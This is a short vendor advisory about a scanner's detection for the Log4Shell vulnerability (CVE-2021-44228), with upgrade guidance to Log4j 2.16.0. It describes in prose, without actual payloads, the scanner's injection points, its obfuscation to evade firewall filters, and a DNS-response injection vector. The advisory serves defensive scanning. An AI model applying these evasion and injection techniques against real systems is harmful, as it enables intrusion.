An emergency detection was deployed on Friday 10th December to detect this flaw based on the most common payload vector. Over the weekend (11th and 12th), AppCheck has been closely monitoring public attack vectors and has released a comprehensive detection that is available to all clients across all scans and profiles.
Current features include:
- Detection via HTTP servers and intermediaries by injecting into parameters, paths and headers.
- Payload obfuscation to evade some flawed filters deployed via Web Application Firewalls and Cloud Security solutions.
- Multiple protocol handler support; dns, rmi and ldap by default.
- Detection via Web Application Scanning and Infrastructure scanning.
- HTTP/2 Headers
- Attacks via DNS response; Submitting a specially crafted hostname that when resolved will return the log4shell payload with the name text of the A record. If this record is then resolved and stored it will trigger a ping back to AppCheck Sentinel
Any existing scans will have this plugin enabled. A dedicated Scan Profile has also been created for customers wishing to scan for this CVE only:
Right now, we believe AppCheck offers the most comprehensive detection available via scanning. However, the nature of this flaw means that there are many possible vectors that are still to be discovered. Our research team are investigating the situation and will be updating our detection as we discover new vectors and affected protocols.
Whilst AppCheck strongly recommend all customers scan under this profile if they wish to check specifically for this vulnerability on their Web Apps and infrastructure, it is recommended that all customers conduct their own checks as the true impact and scale of this vulnerability is yet to be understood due to the evolving nature of the disclosure and the wide range of products effected and many vectors of exploitation.
As an advisory for all customers, AppCheck are aware that the initial fix for CVE-2021-44228 (in 2.15.0) is incomplete in certain non-default configurations (CVE-2021-45046), with the recommendation being upgrading to 2.16.0.
More detail to follow.